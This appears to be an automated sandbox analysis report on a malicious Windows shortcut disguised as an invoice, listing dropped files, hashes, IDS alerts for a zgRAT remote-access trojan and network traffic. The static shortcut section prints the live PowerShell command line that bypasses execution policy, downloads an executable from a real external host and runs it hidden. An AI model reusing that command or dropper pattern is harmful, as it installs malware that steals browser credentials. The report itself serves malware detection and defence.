                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Erwtzpbb.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):159744
                                Entropy (8bit):0.7873599747470391
                                Encrypted:false
                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                Malicious:false
                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Gqzvujl.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):49152
                                Entropy (8bit):0.8180424350137764
                                Encrypted:false
                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                MD5:349E6EB110E34A08924D92F6B334801D
                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Iumpwueev\fqs92o4p.default-release\cert9.db

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                Category:dropped
                                Size (bytes):229376
                                Entropy (8bit):0.64343788909108
                                Encrypted:false
                                SSDEEP:384:A1zkVmvQhyn+Zoz67dNlIMMz333JGN8j/LKXYj5kuv:AUUMXCyIr
                                MD5:B6787B79D64948AAC1D6359AC18AB268
                                SHA1:0831EB15AB2B330BE95975A24F8945ED284D0BA4
                                SHA-256:9D6FD3B8AB8AA7934C75EDE36CEB9CF4DDAD06C5031E89872B4E814D7DB674E2
                                SHA-512:9296866380EF966F1CB6E69B7B84D1A86CD5AE8D9A7332C57543875FAA4FC7F1387A4CF83B7D662E4BAB0381E4AFC9CB9999075EBB497C6756DF770454F3530E
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Iumpwueev\fqs92o4p.default-release\key4.db

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):294912
                                Entropy (8bit):0.08436842005578409
                                Encrypted:false
                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                MD5:2CD2840E30F477F23438B7C9D031FC08
                                SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Japzawmb.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):0.9746603542602881
                                Encrypted:false
                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                Malicious:false
                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Jdwtrhjoz.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):126976
                                Entropy (8bit):0.47147045728725767
                                Encrypted:false
                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Mgauqr.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                Category:dropped
                                Size (bytes):28672
                                Entropy (8bit):2.5793180405395284
                                Encrypted:false
                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Oibwdoubon.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):159744
                                Entropy (8bit):0.7873599747470391
                                Encrypted:false
                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                Malicious:false
                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Sqyigxtxbzu.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.1358696453229276
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Tmlwihiyhr.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.1358696453229276
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Ybmhvst.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):98304
                                Entropy (8bit):0.08235737944063153
                                Encrypted:false
                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Yzpvkpv.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):0.9746603542602881
                                Encrypted:false
                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                Malicious:false
                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Zgsqkqrt.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):159744
                                Entropy (8bit):0.7873599747470391
                                Encrypted:false
                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                Malicious:false
                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Zhubgq.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):126976
                                Entropy (8bit):0.47147045728725767
                                Encrypted:false
                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20re5ceu.21z.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eczr0fqn.rw3.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz4ty1dt.tmc.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhy0tznk.nfw.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QXZ4V51VGYCOI987TN2Z.temp

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4505
                                Entropy (8bit):3.7901843333778507
                                Encrypted:false
                                SSDEEP:48:Br1RqR2dytj5HlRlSogZoZ9ytj5Hl4lSogZo91:RG8mj5HYHYmj5HHHC
                                MD5:B6C70E73A70DFE27ED2ED50F74F3FCCC
                                SHA1:EB7CDD9C00B27A70478078FAAFB61BA500FA9452
                                SHA-256:FF95BB42AD318D7DB9F36755196B72A69D47C8AB381F3A0A30A4BC73B5EFCDB5
                                SHA-512:12BE03F21C5C60ED341AB313F3A0265C1ACD64E5D5FB97AC02AF128D130690B436DFAEC0A251652BE37D0B13AF191D8C7117A0809DB1C42469249AC2CF61A45E
                                Malicious:false
                                Preview:...................................FL..................F. .. ...........8"....}.....L............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....<........8"......p.2.L....Y.. .INOVIC~1.LNK..T......DWQ`.Y.............................=..I.n.o.v.i.c.e._.3._.E.T.H...l.n.k.......W...............-.......V...........|XF......C:\Users\user\Desktop\Inovice_3_ETH.lnk....*...t.x.t.`.......X.......066656...........hT..CrF.f4... .$}T..b...,.......hT..CrF.f4... .$}T..b...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.............."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DWQ`..Windows.@......OwH.Y......3.......................p.W.i.n.d.o.w.s.....Z.1......Y...System32..B......OwH.Y...........................Q...S.y.s.t.e.m.3.2.....t.1......O.I..WindowsP

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ad88b6e81bca2b69.customDestinations-ms (copy)

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4505
                                Entropy (8bit):3.7901843333778507
                                Encrypted:false
                                SSDEEP:48:Br1RqR2dytj5HlRlSogZoZ9ytj5Hl4lSogZo91:RG8mj5HYHYmj5HHHC
                                MD5:B6C70E73A70DFE27ED2ED50F74F3FCCC
                                SHA1:EB7CDD9C00B27A70478078FAAFB61BA500FA9452
                                SHA-256:FF95BB42AD318D7DB9F36755196B72A69D47C8AB381F3A0A30A4BC73B5EFCDB5
                                SHA-512:12BE03F21C5C60ED341AB313F3A0265C1ACD64E5D5FB97AC02AF128D130690B436DFAEC0A251652BE37D0B13AF191D8C7117A0809DB1C42469249AC2CF61A45E
                                Malicious:false
                                Preview:...................................FL..................F. .. ...........8"....}.....L............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....<........8"......p.2.L....Y.. .INOVIC~1.LNK..T......DWQ`.Y.............................=..I.n.o.v.i.c.e._.3._.E.T.H...l.n.k.......W...............-.......V...........|XF......C:\Users\user\Desktop\Inovice_3_ETH.lnk....*...t.x.t.`.......X.......066656...........hT..CrF.f4... .$}T..b...,.......hT..CrF.f4... .$}T..b...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.............."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DWQ`..Windows.@......OwH.Y......3.......................p.W.i.n.d.o.w.s.....Z.1......Y...System32..B......OwH.Y...........................Q...S.y.s.t.e.m.3.2.....t.1......O.I..WindowsP

                                C:\Users\user\AppData\Roaming\svhosts.exe

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):861184
                                Entropy (8bit):7.994714511332683
                                Encrypted:true
                                SSDEEP:24576:0R//cv9DldufefTj0NALGxq/MZwErbJLnBvPu:0RnW9eaTw6acow+JLnR
                                MD5:BD46789E8C6F46CC2D00FEA7E89F1F6F
                                SHA1:84ADDAFD78F6DE2CB5984488CCD79BBB19C4042D
                                SHA-256:39A9419521001E2C5A03D4F6FD99446E9B157083C24C153280AD43C0A234D7F2
                                SHA-512:B5CA48DF342CF02B20A874D52D90F49E07121C94E89AEE9A3BFF7AB809D384CE03EC0D13CDB4FBA913A8B370EA8771B4C219AC14E7191C86071B0BFCDDCF3FC9
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 83%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.f.............................8... ...@....@.. ....................................@.................................D8..W....@..8....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......."..............@..B.................8......H.......,...........D....................................................s.........*.0..........(.........(....o....3.(....-..j*~....%..(....~....o.......j@8...(......s.......o........&..o....s..........o......,...i-....,...o.....(......o ...o!...o.........(....(......(..........c.o".......o"........c.o".......c.o".......o"........c.o"........c.o"........c.o"....o#......j....+)....o$...nX.....bX.....da.....o%......X......3....bX.....da.....bX....!...=.<Ea.~.....o...........(

                                Static File Info

                                General

                                File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                Entropy (8bit):3.4428122779431956
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:Inovice_3_ETH.lnk
                                File size:1'356 bytes
                                MD5:38d714fc636803994a6cb45f41b7e88e
                                SHA1:141b8a2e75ee543aae9247829df050259388310d
                                SHA256:73e70efc9e44e21f50e8586cc917d4751959021c3eba73921ff8c1ca01b933de
                                SHA512:e5d290544da51eeae809b1aef295105e33475df1fa6643a51757a0bd78ae33d0714b399d30d0e38ed6cf690ac590273dfaf8122eee8effee4d51627ea02205b0
                                SSDEEP:24:8J/BHYVKVWf+/CW6+OynbSrUMkWLrab4/1F:8x5aZyGrHXaO
                                TLSH:A42131140EF60328E6B2DF7969BAB31089777C59EF428FCC0250928D2824621F4B5F2F
                                File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                File Icon

                                Icon Hash:69e9a9a9a3a3a1a5

                                Static Windows Shortcut Info

                                General

                                Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Command Line Argument:-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','%APPDATA%\svhosts.exe');Start-Process '%APPDATA%\svhosts.exe'
                                Icon location:*.txt

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                2024-08-14T22:23:43.724101+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile24973080192.168.2.462.173.145.78
                                2024-08-14T22:23:52.582344+0200TCP2857864ETPRO MALWARE Win32/zgRAT CnC Checkin1497327702192.168.2.4188.130.138.23
                                2024-08-14T22:23:45.030899+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile249731443192.168.2.462.173.145.78

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 14, 2024 22:23:42.964771032 CEST4973080192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:42.969650030 CEST804973062.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:42.969733000 CEST4973080192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:42.969950914 CEST4973080192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:42.974740028 CEST804973062.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:43.673069000 CEST804973062.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:43.674741983 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:43.674823999 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:43.674906015 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:43.686526060 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:43.686608076 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:43.724101067 CEST4973080192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:44.645483971 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:44.645819902 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:44.649487972 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:44.649539948 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:44.649900913 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:44.661331892 CEST49731443192.168.2.462.173.145.78
                                Aug 14, 2024 22:23:44.704552889 CEST4434973162.173.145.78192.168.2.4
                                Aug 14, 2024 22:23:45.031049013 CEST4434973162.173.145.78192.168.2.4
